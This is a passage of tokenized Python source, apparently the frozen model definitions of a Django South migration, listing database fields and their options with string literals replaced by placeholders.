[ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" , 
'<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:date>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' , '<STR_LIT>' : "<STR_LIT>" } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> 
u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : "<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ 
] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( 
'<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:time>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' } ) , <EOL> '<STR_LIT:title>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:type>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' 
: { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:0>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:True>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , 
'<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:True>' , '<STR_LIT>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT>' : '<STR_LIT:False>' , '<STR_LIT>' : u"<STR_LIT>" , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> 
'<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:user>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' 
, [ ] , { '<STR_LIT:default>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:default>' : '<STR_LIT:False>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) <EOL> } , <EOL> u'<STR_LIT>' : { <EOL> '<STR_LIT:Meta>' : { '<STR_LIT>' : "<STR_LIT>" , '<STR_LIT:object_name>' : '<STR_LIT>' } , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : 
'<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT:email>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:1>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> u'<STR_LIT:id>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:primary_key>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:blank>' : '<STR_LIT:True>' , '<STR_LIT:related_name>' : "<STR_LIT>" , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:to>' : u"<STR_LIT>" } ) , <EOL> '<STR_LIT:name>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT:100>' , '<STR_LIT:null>' : '<STR_LIT:True>' , '<STR_LIT:blank>' : '<STR_LIT:True>' } ) , <EOL> '<STR_LIT>' : ( '<STR_LIT>' , [ ] , { '<STR_LIT:max_length>' : '<STR_LIT>' , '<STR_LIT:null>' : '<STR_LIT:True>' , 
